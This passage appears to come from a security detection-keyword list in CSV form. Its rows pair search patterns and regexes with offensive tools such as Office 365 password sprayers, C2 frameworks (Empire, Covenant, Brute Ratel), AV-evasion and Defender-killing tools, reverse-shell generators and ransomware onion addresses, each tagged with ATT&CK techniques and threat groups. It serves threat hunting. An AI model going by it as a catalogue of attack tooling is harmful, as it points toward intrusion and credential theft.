T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53782" "*o+m4iqAKlqR7eURppDGi16WEExMD/fkjI15nVPOHSXI=*",".{0,1000}o\+m4iqAKlqR7eURppDGi16WEExMD\/fkjI15nVPOHSXI\=.{0,1000}","offensive_tool_keyword","POC","PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855","T1078.001 - T1078.003 - T1078.004 - T1078 - T1189","TA0006 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sinsinology/CVE-2024-29855","1","0","N/A","N/A","10","1","17","7","2024-06-17T10:45:06Z","2024-06-13T08:32:55Z","53783" 
"*o0AAAAEFRQVBSUVZIMdJlSItSYD5Ii1IYPkiLUiA+SItyUD5ID7dK*",".{0,1000}o0AAAAEFRQVBSUVZIMdJlSItSYD5Ii1IYPkiLUiA\+SItyUD5ID7dK.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","53784" "*O365 Enumeration via ActiveSync module --*",".{0,1000}O365\sEnumeration\svia\sActiveSync\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53785" "*O365 Enumeration via Office.com module --*",".{0,1000}O365\sEnumeration\svia\sOffice\.com\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53786" "*O365 Enumeration via OneDrive module --*",".{0,1000}O365\sEnumeration\svia\sOneDrive\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53787" "*O365 Spraying via ActiveSync module --*",".{0,1000}O365\sSpraying\svia\sActiveSync\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - 
T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53788" "*O365 Spraying via ADFS module --*",".{0,1000}O365\sSpraying\svia\sADFS\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53789" "*O365 Spraying via MSOL module --*",".{0,1000}O365\sSpraying\svia\sMSOL\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53790" "*o365-Attack-Toolkit*",".{0,1000}o365\-Attack\-Toolkit.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","53791" "*o365-attack-toolkit*",".{0,1000}o365\-attack\-toolkit.{0,1000}","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","N/A","10","10","1068","217","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z","53792" "*o365creeper.git*",".{0,1000}o365creeper\.git.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","53793" "*o365creeper.py*",".{0,1000}o365creeper\.py.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","53794" "*o365creeper-master*",".{0,1000}o365creeper\-master.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","53795" "*o365enum.py*",".{0,1000}o365enum\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses 
FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","53796" "*o365enum.py*",".{0,1000}o365enum\.py.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","1","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","53797" "*o365enum-master*",".{0,1000}o365enum\-master.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","1","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","53798" "*o365recon.ps1*",".{0,1000}o365recon\.ps1.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","53799" "*o365recon-master*",".{0,1000}o365recon\-master.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","53800" "*o365spray --enum 
*",".{0,1000}o365spray\s\-\-enum\s.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","53801" "*o365spray --spray *",".{0,1000}o365spray\s\-\-spray\s.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","53802" "*o365spray --validate*",".{0,1000}o365spray\s\-\-validate.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","53803" "*o365spray.core.handlers.sprayer*",".{0,1000}o365spray\.core\.handlers\.sprayer.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","53804" "*o6pi3u67zyag73ligtsupin5rjkxpfrbofwoxnhimpgpfttxqu7lsuyd.onion*",".{0,1000}o6pi3u67zyag73ligtsupin5rjkxpfrbofwoxnhimpgpfttxqu7lsuyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53805" 
"*oab-parse.py*",".{0,1000}oab\-parse\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","53806" "*oaburl.py */*:*@* -e *",".{0,1000}oaburl\.py\s.{0,1000}\/.{0,1000}\:.{0,1000}\@.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 
- T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53807" "*'Obfu'+'scation Ro'+'cks!'*",".{0,1000}\'Obfu\'\+\'scation\sRo\'\+\'cks!\'.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#content","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","53808" "*obfuscate.py grunt*",".{0,1000}obfuscate\.py\sgrunt.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","53809" "*Obfuscate.py*",".{0,1000}Obfuscate\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","53810" "*obfuscate/shellter*",".{0,1000}obfuscate\/shellter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","53811" 
"*obfuscate_cmdlet*",".{0,1000}obfuscate_cmdlet.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","53812" "*obfuscate_command*",".{0,1000}obfuscate_command.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","53813" "*obfuscated_module_source/*",".{0,1000}obfuscated_module_source\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53814" 
"*obfuscation.exe --*",".{0,1000}obfuscation\.exe\s\-\-.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","53815" "*obfuscation.exe -f * -t *",".{0,1000}obfuscation\.exe\s\-f\s.{0,1000}\s\-t\s.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","53816" "*obfuscator*antidisassembly.*",".{0,1000}obfuscator.{0,1000}antidisassembly\..{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","53817" "*obfuscator.cpp*",".{0,1000}obfuscator\.cpp.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","53818" "*obfuskittiedump*",".{0,1000}obfuskittiedump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","53819" "*ObjectQuery(""SELECT * FROM MSFT_MpPreference"")*",".{0,1000}ObjectQuery\(\""SELECT\s.{0,1000}\sFROM\sMSFT_MpPreference\""\).{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","53820" "*objects_constrained_delegation_full.txt*",".{0,1000}objects_constrained_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","53822" "*objects_rbcd_delegation_full.txt*",".{0,1000}objects_rbcd_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","53823" "*objects_unconstrained_delegation_full.txt*",".{0,1000}objects_unconstrained_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","53824" "*objexec 
*.o*",".{0,1000}objexec\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53825" "*objShell.Run ""calc.exe""*",".{0,1000}objShell\.Run\s\""calc\.exe\"".{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#content","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","53826" "*obscuritylabs/ase:latest*",".{0,1000}obscuritylabs\/ase\:latest.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - 
BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","53827" "*obscuritylabs/RAI/*",".{0,1000}obscuritylabs\/RAI\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","53828" "*octetsplicer/LAZYPARIAH*",".{0,1000}octetsplicer\/LAZYPARIAH.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","N/A","2","140","28","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z","53830" "*Octoberfest7/JumpSession_BOF*",".{0,1000}Octoberfest7\/JumpSession_BOF.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","53831" "*Octoberfest7/KDStab*",".{0,1000}Octoberfest7\/KDStab.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
